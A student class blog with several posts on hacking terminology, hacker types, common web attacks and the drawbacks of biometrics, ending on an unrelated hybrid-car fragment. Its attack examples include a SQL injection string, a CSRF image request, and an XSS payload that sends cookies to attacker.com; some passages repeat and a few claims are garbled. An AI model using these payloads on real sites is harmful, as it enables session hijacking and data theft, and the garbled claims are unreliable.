Hacker Stats…

Image result for examples of hacking

                In computing, a hacker is any highly skilled computer expert. Depending on the field of computing it has slightly different meanings, and in some contexts has controversial moral and ethical connotations. In its original sense, the term refers to a person in any one of the communities.
Hacker (computer security). People involved with circumvention of computer security. This primarily concerns unauthorized remote computer break-ins via communication networks such as the Internet, but also includes those who debug or fix security problems, and the morally ambiguous

Examples:

Image result for examples of hacking

Image result for examples of hacking

Image result for examples of hacking

Problem with bio-metrics for identification:

This shift to bio-metric-enabled security creates profound threats to commonly accepted notions of privacy and security. It makes possible privacy violations that would make the National Security Agency’s data sweeps seem superficial by comparison.

Biometrics could turn existing surveillance systems into something categorically new—something more powerful and much more invasive. Consider the so-called Domain Awareness System, a network of 3,000 surveillance cameras in New York City. Currently if someone commits a crime, cops can go back and review sections of video. Equip the system with facial-recognition technology, however, and the people behind the controls can actively track you throughout your daily life. “A person who lives and works in lower Manhattan would be under constant surveillance,” says Jennifer Lynch, an attorney at the Electronic Frontier Foundation, a nonprofit group. Face-in-a-crowd detection is a formidable technical problem, but researchers working on projects such as the Department of Homeland Security’s Bio-metric Optical Surveillance System (BOSS) are making rapid progress.

In addition, once your face, iris or DNA profile becomes a digital file, that file will be difficult to protect. As the recent nsa revelations have made clear, the boundary between commercial and government data is porous at best. Bio-metric identifiers could also be stolen. It’s easy to replace a swiped credit card, but good luck changing the patterns on your iris.

This could result to a great copy of your identity not only physically but also biologically in a way of hacking or being hacked.

Sources Links:

 

Posted here by:

Rusel II B. Feliscuzo
BSIT III
IT 314

Advertisements

HACKING

The word “hacker” in the early days was a creative programmer who wrote very clever programs. High school and college students would enjoy the intellectual challenges presented by hacking a system. It would allow them to enhance their abilities about programming. If they bypassed a system it would give them a sense of accomplishment and pride. Compared to hackers now, “hackers” back then did not have omnious reasons to hack a computer; however, because more information is now stored online, hackers want to take a shortcut to economic and personal gains. Additionally, the globalized society has created more opportunities to not just hack from one country but every country. -Cau Thoong
EXAMPLE OF HACKING
images.jpg
hacking-ansible-21-638.jpg

Identification v. authentication

Biometrics can be used in two very distinct ways: as a means of authentication, and as a means of identification. Using a biometric (say, a fingerprint) to authenticate is akin to using a password in combination with a username. The first tells the system who you claim to be, the second attempts to verify that using something you have (like a keycard), something you know (like a password), or something you are (like a fingerprint scan). Using a biometric for identification attempts to determine who you are, within a database of possibilities, using biometric information.

Using a fingerprint scan for identification is much more problematic than using it for authentication. This is a bit like telling people to enter a password and, if it matches any password in the system, allow them into that person’s account. It isn’t quite that bad, because fingerprints are more unique and secure than passwords, but the problem remains that as the size of the database increases, the probability of false matching increases.

For another example, imagine you are trying to identify the victim of a car wreck using dental records. If person X is the registered owner and hasn’t been heard from since the crash, we can use dental records to authenticate that a badly damaged body almost certainly belongs to person X. This is like using biometrics for authentication. Likewise, if we know the driver could be one of three people, we can ascertain with a high degree of certainty which it is, by comparing dental x-rays from the body with records for the three possible matches. The trouble arises when we have no idea who person X is, so we try running the x-rays against the whole collection that we have. Not only is this likely to be resource intensive, it is likely to generate lots of mistakes, for reasons I will detail shortly.

The big database problem in security settings

The problem of a big matching database is especially relevant when you are considering the implementation of wholesale surveillance. Ethical issues aside, imagine a database of the faces of thousands of known terrorists. You could then scan the face of everyone coming into an airport or other public place against that set. Both false positive and false negative matches are potentially problematic. With a false negative, a terrorist in the database could walk through undetected. For any scanning system, some probability (which statisticians call Beta, or the Type II Error Rate) attaches to that outcome. Conversely, there is the possibility of identifying someone not on the list as being one of the listed terrorists: a false positive. The probability of this is Alpha (Type I Error Rate), and it is in setting that threshold that the relative danger of false positives and negatives is established.

A further danger is somewhat akin to ‘mission creep’ – the logic that, since we are already here, we may as well do X in addition to Y, where X is our original purpose. This is a very frequent security issue. For example, think of driver’s licenses. Originally, they were meant to certify to a police officer that someone driving a car is licensed to do so. Some types of people would try to attack that system and make fake credentials. But once having a driver’s license lets you get credit cards, rent expensive equipment, secure other government documents, and the like, a system that existed for one purpose is vulnerable to attacks from people trying to do all sorts of other things. When that broadening of purpose is not anticipated, a serious danger exists that the security applied to the originally task will prove inadequate.

A similar problem exists with potential terrorist matching databases. Once we have a system for finding terrorists, why not throw in the faces of teenage runaways, escaped convicts, people with outstanding warrants, etc, etc? Again, putting ethical issues aside, think about the effect of enlarging the match database on the possibility of false positive results. Now, if we can count on security personnel to behave sensibly when such a result occurs, there may not be too much to worry about. Numerous cases of arbitrary detention, and even the use of lethal force, demonstrate that this is a serious issue indeed.

The problem of rare properties

In closing, I want to address a fallacy that relates to this issue. When applying an imperfect test to a rare case, you are almost always more likely to get a false positive than a legitimate result. It seems counterintuitive, but it makes perfect sense. Consider this example:

I have developed a test for a hypothetical rare disease. Let’s call it Panicky Student Syndrome (PSS). In the whole population of students, one in a million is afflicted. My test has an accuracy of 99.99%. More specifically, the probability that a student has PSS is 99.99%, given that they have tested positive. That means that if the test is administered to a random collection of students, there is a one in 10,000 chance that a particular student will test positive, but will not have PSS. Remember that the odds of actually having PSS are only one in a million. There will be 100 false positives for every real one – a situation that will arise in any circumstance where the probability of the person having that trait (whether having a rare disease or being a terrorist) is low.

Given that the reliability of even very expensive biometrics is far below that of my hypothetical PSS test, the ration of false positives to real ones is likely to be even worse. This is something to consider when governments start coming after fingerprints, iris scans, and the like in the name of increased security.

This entry was originally a post on my blog, at: http://www.sindark.com/2006/10/02/basic-problems-with-biometric-security/

Posted by: Edna Mae Buniel

“HACKING”

What Is a Hacker, Really?

The basic definition of a hacker is someone who uses a computer system to gain unauthorized access to another system for data or who makes another system unavailable. These hackers will use their skills for a specific goal, such as stealing money, gaining fame by bringing down a computer system, or making a network unavailable — even sometimes destroying them. However, there are three different types of hackers, each with a particular goal, and not all are the bad guys.

Types of Hacking

Ways Hackers Hack Your Site.

1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

DDoS, or Distributed Denial of Services, is where a server or a machine’s services are made unavailable to its users.

And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.

It’s kind of like having your car stolen when you really need to get somewhere fast.

The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.

The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.

Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

2. REMOTE CODE EXECUTION ATTACKS

A Remote Code Execution attack is a result of either server side or client side security weaknesses.

Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.

The following vulnerable components were downloaded 22 million times in 2011:

Apache CXF Authentication Bypass (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451)

By failing to provide an identity token, attackers could invoke any web service with full permission.

3. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.

In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.

In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A CROSS SITE ATTACK EXAMPLES

Here’s an example:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src=”<span style=”color: red;”>http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />

In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

4. SYMLINKING – AN INSIDER ATTACK

A symlink is basically a special file that “points to” a hard link on a mounted file system.  A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not.

If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.

In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

5. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”.

It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.

The problem, of course, is that you’re not getting into what you think you’re getting into.

A classic example of a social engineering attack is the “Microsoft tech support” scam.

This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.

Here’s an article from Wired.com on how a security expert played along with so-called Microsoft tech support person.

Biometrics

are a security approach that offers great promise, but also presents users and implementers with a number of practical problems.  Whilst some of these are technical, and possess technical solutions, however difficult they may be to implement, others are social and cultural.  Social and cultural barriers are much more complicated to resolve, and need much more thought by would-be implementers as well as the manufacturers and suppliers before they will succeed.  Culturally, one size does not fit all, and that may increase the cost and complexity of solutions.

DISADVANTAGES OF BIOMETRICS

PROCESSES OF BIOMETRICS

COMMON BIOMETRICS

Biometric technologies can either be physiological or behavioral. Physical biometrics includes fingerprint, facial recognition, hand geometry, iris scan, and retina scan. Voice recognition, signature and keystroke are all examples of behavioral biometrics. The commonly used biometrics are briefly described below.

FINGERPRINTING

“Fingerprints are the impressions of the papillary or friction ridges on the surfaces of the hand” (Higgins 2003, p.45). He stated further fingerprints are the oldest and most widely recognized biometric markers. This statement is backed by Chirillo and Blaul (2003, p. 4) who stated that fingerprint recognition is one of the oldest biometric technologies. Lockie (2002, p. 16) also stated that fingerprints are the most commonly used biometric.

Fingerprints have been used by humans for personal identification and access control for centuries. The matching accuracy using the biometric type has shown very high figure. Fingerprints of even identical twins are different and so are the prints on each finger of the same person which increases the rate of accuracy.

According to postnote (2001), at a national level, automated fingerprinting is the only biometric used generally in the United Kingdom. An investigative project, which was to be completed by April 2002, was looking at the concept of using a single biometric identifier, likely to be fingerprints by default, throughout the Criminal Justice System including police, prisons and courts. Prisons already take ink fingerprints from convicted prisoners. These can be compared against the police database as proof that the right person is being held. An automated system would give rapid confirmation of a person’s identity and allow Information about individuals to be shared quickly and easily.

Below are some strengths and weaknesses of fingerprinting according to Nanavati (2002 p. 45).

Strengths of deploying fingerprint technology include:

  • It can be used in a range of environment.
  • It is a mature and proven core technology capable of high level accuracy.
  • It employs ergonomic and easy-to-use devices.
  • The ability to enrol multiple fingers can increase system accuracy and flexibility.

Weaknesses of fingerprint technology include:

  • Most devices are unable to enrol some small percentage of users.
  • Performance can deteriorate over time.
  • It is associated with forensic applications.

FACE RECOGNITION

Facial scan technology employs distinctive features of the human face in order to identify or verify a user. Face appearance is particularly, a compelling biometric because of its everyday use by nearly everyone as the primary source of recognizing other humans. It is more acceptable than most biometrics because of its naturalness. Faces have been institutionalized as a guarantor of identity in identity cards and passports since photography became prominent.

However, Chirillo & Blaul (2003 p. 55) stated that most face recognition and identification devices do not indeed perform a scan but instead, capture an image of the face in a video or picture format. He further added that the information is converted to a template or a data representation of the captured information, while the initial information is stored. After this process, subsequent scanned faces can then be compared to the original captured faces.

Strengths and weaknesses of face recognition technology are given below according to Nanavati (2002 p. 63).

Strengths of facial recognition include:

  • It is capable of leveraging existing image acquisition equipment.
  • It is capable of searching against static image such as passports and driver’s license photographs.
  • It is the only biometric capable of operating without user cooperation.

Weaknesses of this technology include:

  • Matching accuracy is reduced by change in acquisition environment.
  • Matching accuracy is also reduced by changes in physiological characteristics.
  • Tendency of privacy abuse is high due to non-cooperative enrollment and identification capabilities.

IRIS-SCAN

Bolle et al (2004 p. 43) defined iris as “the colored part of the eye bounded by the pupil and sclera.” He added that iris has been purported as a universal biometric identifier with very good discriminating characteristics. Iris-scan technology uses the distinctive characteristics of the human iris in order identify or verify the identity of the users. Nanavati (2002 p. 77) stated that Iris-scan technology has the potential to play a major or large role in the biometric marketplace if real-world systems as well as solutions meet the theoretical promise of this technology. He further added that Iris-scan technology has been successfully deployed in high-security physical access applications, ATMs and also kiosks for banking and travel applications. The technology is also being positioned for desktop usage. Nanavati (2002) stated some strengths and weaknesses of Iris-scan technology.

Strengths of Iris-scan technology:

  • It has the potential for exceptionally high levels of accuracy.
  • It is capable of reliable verification as well as identification.
  • It maintains stability of characteristics over a lifetime frame.

Weaknesses of Iris-scan technology:

  • It has a propensity for false rejection.
  • Acquisition of the images requires moderate attentiveness and training.
  • Some users exhibit a certain degree of discomfort with eye-based technology.
  • A proprietary acquisition device is required for deployment.

VOICE RECOGNITION; VOICE SCAN

According to Chirillo & Blaul (2003, p. 201), Voice recognition actually s comprised of two different types of technology which are voice scan and speech recognition. They explained further that voice-scan is deployed to authenticate a user based on his or her voice characteristics; while on the other hand, speech recognition is used for the “technological comprehension” of spoken words.

Voice-scan technology makes use of the distinctive aspects of the voice to identify or verify the identity of users. Voice-scan is sometimes taken as speech recognition, a technology that works by translating what a user is saying (the process in speech recognition is unrelated to authentication). Nanavati (2002, p. 87) described voice-scan technology as one that verifies the identity of the user who is speaking. Bolle et al (2003, p. 40) stated that similar to face appearance, voice-scan (also known as voice recognition) is often used due to its prevalence in human communication and its day to day use. They further added that voice is a behavioral biometric but it depends on some underlying physical traits, which “govern the type of speech signals we are able and likely to utter.” Examples of these physical traits are the fundamental frequency (which is a function of the vocal tract length), cadence, nasal tone. Nanavati (2002, p. 87) stated the strengths and weaknesses of voice-scan.

Strengths of voice-scan technology:

  • It is capable of leveraging telephony infrastructure.
  • It effectively layers with other processes such as speech recognition and verbal passwords.
  • It generally lacks the negative perceptions associated with other biometrics.

Weaknesses of voice-scan technology:

  • It is potentially more susceptible to replay attacks than other biometrics.
  • Its accuracy is challenged by low-quality capture devices, ambient noise, etc.
  • The success of voice-scan as a PC solution requires users to develop new habits.
  • The large size of the template limits the number of potential applications.

HAND-SCAN

Hand -scan is one of the most established biometric technologies. It has been in use for years in several applications especially for verification of individuals. According to Nanavati (2002, p. 99), hand-scan technology make use of the distinctive parts of the hand particularly, the height and the width of the back of the hand as well as the finger. Hand-scan is more of an application specific solution than majorities of biometric technologies and is used exclusively for physical access and also, time and attendance applications.

Although hand-scan geometry biometrics is still a technology that is growing slowly, Chirillo & Blaul (2003, p. 145) stated that estimates forecast revenues to increase to approximately $50 million in 2005, which is approximately 2 to 5 percent of the whole biometric market. They gave primary reason for the minimal forecast as limited usages and aptness mainly for access control and time and attendance applications.

Nanavati (2002, p. 99) stated the strengths and weaknesses of hand-scan technology.

Strengths of hand-scan technology:

  • It is able to operate in challenging environments.
  • It is an established, reliable core technology.
  • It is generally perceived as non intrusive.
  • It is based on relatively stable physiological characteristics.

Weaknesses of hand-scan technology:

  • It has limited accuracy.
  • The form factor limits the scope of potential applications.
  • The ergonomic design limits usage by certain populations.

Chirillo & Blaul (2003, p. 146) stated cost as a weakness stating that approximately, hand-scan reader cost $1,400 to $2000, placing the devices towards the high end of the physical security spectrum.

WHERE NOT TO USE BIOMETRICS

Biometrics offer great amount of benefits in safeguarding systems and is perceived as more reliable than other security techniques (traditional security methods). However, biometric technologies are not the perfect security to be deployed for every application and in some cases biometric authentication is just not the right solution.”

One of the major challenges facing the biometric industry is defining those environments in which biometrics offer the strongest benefits to both individuals and institutions, and then showing that the benefits of deployment outweigh the risk as well as the costs (Nanavati 2002, p. 7).

Posted by:

Delicana, Flora Mae

Hacking

A. What did the word “hacker” means in the early days of computing?

            -The word hacker originally was used to describe someone who was proficient in using a computer. The word did not receive its bad connotation until the 1980’s. Early “hackers” were people who enjoyed to explore computers and make them do things that were unheard of at the time. A “good hack” was used to describe a well coded program, but in today’s world, when people hear the word hack they usually begin to think of someone who manipulates or steals information and uses it for their own personal gain.
                                                                                                                – Joshua Dixon

Types of Hacker 

  1. Script Kiddie – Script Kiddies normally don’t care about hacking (if they did, they’d be Green Hats. See below.). They copy code and use it for a virus or an SQLi or something else. Script Kiddies will never hack for themselves; they’ll just download overused software (LOIC or Metasploit, for example) and watch a YouTube video on how to use it. A common Script Kiddie attack is DoSing or DDoSing (Denial of Service and Distributed Denial of Service), in which they flood an IP with so much information it collapses under the strain. This attack is frequently used by the “hacker” group Anonymous, which doesn’t help anyone’s reputation.
  2. White Hat – Also known as ethical hackers, White Hat hackers are the good guys of the hacker world. They’ll help you remove a virus or PenTest a company. Most White Hat hackers hold a college degree in IT security or computer science and must be certified to pursue a career in hacking. The most popular certification is the CEH (Certified Ethical Hacker) from the EC-Council.
  3. Black Hat – Also known as crackers, these are the men and women you hear about in the news. They find banks or other companies with weak security and steal money or credit card information. The surprising truth about their methods of attack is that they often use common hacking practices they learned early on.
  4. Gray Hat – Nothing is ever just black or white; the same is true in the world of hacking. Gray Hat hackers don’t steal money or information (although, sometimes they deface a website or two), yet they don’t help people for good (but, they could if they wanted to). These hackers comprise most of the hacking world, even though Black Hat hackers garner most (if not all) of the media’s attention.
  5. Green Hat – These are the hacker “n00bz,” but unlike Script Kiddies, they care about hacking and strive to become full-blown hackers. They’re often flamed by the hacker community for asking many basic questions. When their questions are answered, they’ll listen with the intent and curiosity of a child listening to family stories.
  6. Red Hat – These are the vigilantes of the hacker world. They’re like White Hats in that they halt Black Hats, but these folks are downright SCARY to those who have ever tried so much as PenTest. Instead of reporting the malicious hacker, they shut him/her down by uploading viruses, DoSing and accessing his/her computer to destroy it from the inside out. They leverage multiple aggressive methods that might force a cracker to need a new computer.
  7. Blue Hat – If a Script Kiddie took revenge, he/she might become a Blue Hat. Blue Hat hackers will seek vengeance on those who’ve them angry. Most Blue Hats are n00bz, but like the Script Kiddies, they have no desire to learn.

————————————————

B. Examples of Hacking

 

1.  INJECTION ATTACKS

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or “injections”, unknowingly.

In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data.

TECHNICAL INJECTION ATTACK EXAMPLE:

An Injection Attack could have this command line:

String query = “SELECT * FROM accounts WHERE custID=’” + request.getParameter(“id”) +”‘”;

The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ‘1’=’1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.

2. CROSS SITE SCRIPTING ATTACKS

Cross Site Scripting, also known as an XSS attack, occurs when an application, url “get request”, or file packet is sent to the web browser window and bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate.

For example, if http://www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info.

TECHNICAL CROSS SITE SCRIPTING EXAMPLE:

A more technical example:

(String) page += “<input name=’creditcard’ type=’TEXT’ value=’” + request.getParameter(“CC”) + “‘>”;

The attacker modifies the ‘CC’ parameter in their browser to:

‘>document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie’

This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session.  That means the hacker has access to the website admin credentials and can take complete control over it.  In other words, hack it.

3. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS

If the user authentication system of your website is weak, hackers can take full advantage.

Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).

If a hacker exploits the authentication and session management system, they can assume the user’s identity.

Scary indeed.

Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:

  • Are user credentials weak (e.g. stored using hashing or encryption)?
  • Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
  • Are session IDs exposed in the URL (e.g. URL rewriting)?
  • Are session IDs vulnerable to session fixation attacks?
  • Do session IDs timeout and can users log out?

If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

4. CLICKJACKING ATTACKS

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.

Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.

For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.

CLICKJACKING EXAMPLE:

Here’s a live, but safe example of how clickjacking works:

http://attacker.kotowicz.net/alphabet-hero/game.html

And here’s a video that shows how we helped Twitter defend against a Clickjacking attack:

5. DNS CACHE POISONING

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.

Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.

This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path.

In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

6. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”.

It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.

The problem, of course, is that you’re not getting into what you think you’re getting into.

A classic example of a social engineering attack is the “Microsoft tech support” scam.

This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.

Here’s an article from Wired.com on how a security expert played along with so-called Microsoft tech support person.

7. SYMLINKING – AN INSIDER ATTACK

A symlink is basically a special file that “points to” a hard link on a mounted file system.  A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not.

If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.

In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

8. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.

In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.

In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A CROSS SITE ATTACK EXAMPLES

Here’s an example:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src=”<span style=”color: red;”>http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />

In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

9. REMOTE CODE EXECUTION ATTACKS

A Remote Code Execution attack is a result of either server side or client side security weaknesses.

Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.

The following vulnerable components were downloaded 22 million times in 2011:

Apache CXF Authentication Bypass (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451)

By failing to provide an identity token, attackers could invoke any web service with full permission.

10. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

DDoS, or Distributed Denial of Services, is where a server or a machine’s services are made unavailable to its users.

And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.

It’s kind of like having your car stolen when you really need to get somewhere fast.

The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.

The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.

Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

source :http://defencely.com/blog/tag/types-of-hacking/

————————————————

C. What is one problem with using bio metrics for identificaton?

          In my own opinion, nothing is 100% secure.  Consider the additional cost of authentication equipment (rentinal scanners, finger print scanners) and authentication software (can’t run the hardware without the drivers and software for them) compared to something like an ATM card where you take cheaper fabrication of  plastics and let the user assign a meaningful code to them.  –

-Judems Daub BSIT-III

Hacking

The word hacker originally was used to describe someone who was proficient in using a computer. The word did not receive its bad connotation until the 1980’s. Early “hackers” were people who enjoyed to explore computers and make them do things that were unheard of at the time. A “good hack” was used to describe a well coded program, but in today’s world, when people hear the word hack they usually begin to think of someone who manipulates or steals information and uses it for their own personal gain.
-Joshua Dixon
Hacking is when somebody gains access to a computer, typically without permission, to preform a certain task. Tasks range from using the computer as a distribution point for spam, downloading files from the computer, stealing account info for various services, etc.
Examples of Hacking

1. Trojans

A Trojan is malware disguised as harmless software, named after the wooden horse the ancient Greeks used to trick their way into the city of Troy. The intent of the hacker is to get you to install it by making you believe it’s safe. Once installed on your computer, a Trojan can do anything from logging your keystrokes, to opening a backdoor and giving the hacker access to your system.

There are several ways in which a Trojan can infect your personal computer. The most common infection vector hackers use is to trick you into clicking on a file or email attachment. Often, these attachments can come to you by way of a friend whose account has already been compromised, making you believe the contents are from a trustworthy source. Other times the hacker may try to scare you into opening the attachment, making it seem like it is an official notice from the IRS, FBI, or your bank.

Email may be a popular delivery vehicle for Trojans, but it’s not the only one. Clicking on a malicious link on Facebook or other social media sites can allow a hacker to inject a Trojan into your personal computer. Even though these sites take security seriously and are as vigilant as possible, there have been instances when Trojans have infected users this way.

2. Drive-By Downloads

In a drive-by download attack, you don’t have to click on anything to initiate the download and installation of malware – just visiting a website that has been compromised is enough to get your computer infected. A rather dated but good example of this was the infected site known as LyricsDomain.com. According to Spyware Warrior, in 2004, Internet users who visited LyricsDomain.com had unwanted software installed on their systems – a collection of eight advertising programs that, in addition to causing other problems, hijacked the users’ homepage and search bar, and placed advertisements in the users’ “Favorites” folder.

A drive-by download exploits exposed security flaws in your web browser, operating system, or other software that has not been recently updated or patched. Unfortunately, the download and installation of the malware is invisible to the victim. Also, there is no way to tell whether a website is infected just by looking at it.

If you suspect that a site poses a possible threat to your computer, check a blacklist of malicious websites before navigating to the homepage. BlackListAlert.org is a free service that can alert you as to which sites have been placed on a blacklist.

The stealth and effectiveness of a drive-by download makes it one of the best methods in a hacker’s arsenal today. As a result, this form of attack has been on the rise and will only continue to get worse unless computer users take the proper precautions. Updating your software and using the latest version of your favorite web browser is a good start since it will close any newly discovered security holes these infected sites can exploit.

3. Rootkits

A rootkit is not exactly malware like a virus or Trojan. It is something much more insidious: a malicious segment of code injected into your computer system, designed to hide any unauthorized activity taking place. Since rootkits grant administrative control to the attacker, your computer can be used without restrictions and without your knowledge.

A rootkit can attack and replace important operating system files, allowing it to hide or disguise itself and other malware. Once a rootkit has buried itself deep within your system, it can cover an intruder’s tracks (by altering system logs), cover up evidence of malicious processes running in the background, hide files of all types, and open a port to create a backdoor.

Some rootkits are designed to infect a computer’s BIOS (basic input/output system), which is a type of firmware that initializes the hardware when your computer is powered on. When rootkits invade this part of your system, it makes even operating system reinstallation or disk replacement an ineffective strategy to neutralize the rootkit infection.

Many of the worst, most destructive kinds of malware use rootkit technology. Since rootkits can infect different areas and different files, it is very difficult for even moderately experienced users to deal with them. Unfortunately, you will not even know whether you have this type of malware since it is designed to hide itself so effectively. That is why avoiding questionable sites, diligently updating your antivirus software, avoiding dubious email attachments, and generally protecting your system is a good way to make sure you never fall victim to this type of ingeniously malicious infection.

Source: http://www.moneycrashers.com/computer-hacking-methods-examples-cyber-criminals/

One problem with using Bio-metrics for identification

Biometrics are a security approach that offers great promise, but also presents users and implementers with a number of practical problems.  Whilst some of these are technical, and possess technical solutions, however difficult they may be to implement, others are social and cultural.  Social and cultural barriers are much more complicated to resolve, and need much more thought by would-be implementers as well as the manufacturers and suppliers before they will succeed.  Culturally, one size does not fit all, and that may increase the cost and complexity of solutions.

For some considerable time now the personal identification segment of the IT security industry has been trying to improve on the use of the identifier and password as the means of authenticating the user of an IT service.  The problems of managing password based systems, their weaknesses, and the (now) classical ways of attacking or subverting such systems are well documented and need not be considered here.

Many consider that such simple authentication measures need to be reinforced, and refer to multi-factor authentication, based upon:

  • a secret that you know (password)
  • something that you have (a token)
  • something that you are (a biometric).

In the IT world, probably the most commonly implemented method for token authentication is the SecureID token. (Smart cards for mass transit rail systems and telephone cards are more numerous, although they do not really authenticate the user.   Possession of the token authorizes the holder to have a use.)

The introduction of advanced security techniques such as public key cryptography (better known as PKI – public key infrastructure) has increased the need to be able to store secret information (a private key), because a user could never remember a randomly constructed password that long (RSA 2048 would require you to remember a mere 256 characters worth of information and be able to input it reliably!).

The rapid increase in fraud, and in particular credit card fraud, is creating demands for greater security methods than magnetic stripe cards and handwritten signatures offer.  This has seen many card issuers issue chip or smart cards which require a password (commonly a four digit PIN) before they can be used.  However, these are by no means generally implemented.  A spot check on the various cards in my pocket showed only 50% of the various bank/credit cards have chips, whilst none of the others have that facility.

Source: http://www.articsoftpgp.com/biometrics.htm

 

-Geraldine Kaye Medrocillo

The Definitions, Examples of Hacker, and Problem of using Biometrics

downloadAccording to my research In the early days of computering, the word “hacker” meant a creative programmer who wrote very eleghant or clever programs. The word hacker originally was used to describe someone who was proficient in using a computer. The word did not receive its bad connotation until the 1980’s. Early “hackers” were people who enjoyed to explore computers and make them do things that were unheard of at the time. A “good hack” was used to describe a well coded program, but in today’s world, when people hear the word hack they usually begin to think of someone who manipulates or steals information and uses it for their own personal gain.

“Hybrid Cars”

Defining Hybrids
A vehicle is a hybrid if it utilizes more than one form of onboard energy to achieve propulsion. In practice, that means a hybrid will have a traditional internal-combustion engine and a fuel tank, as well as one or more electric motors and a battery pack.

Hybrid cars are sometimes mistakenly confused with electric vehicles. Hybrids are most often gasoline-burning machines that utilize their electric bits to collect and reuse energy that normally goes to waste in standard cars. Theoretically, diesel-electric hybrids would be even more fuel-efficient, but hybrid systems and diesel engines both represent extra cost. So far, installing both in the same vehicle has proven to be prohibitively expensive.

Examples:

  1. Outlander PHEV GX4hs

    Image result for mitsubishi outlander phev featuresNew features for 2016

    • Auto-Dimming Rear View Mirror
    • New Design Leather Seats
    • LED Daytime Running Lights
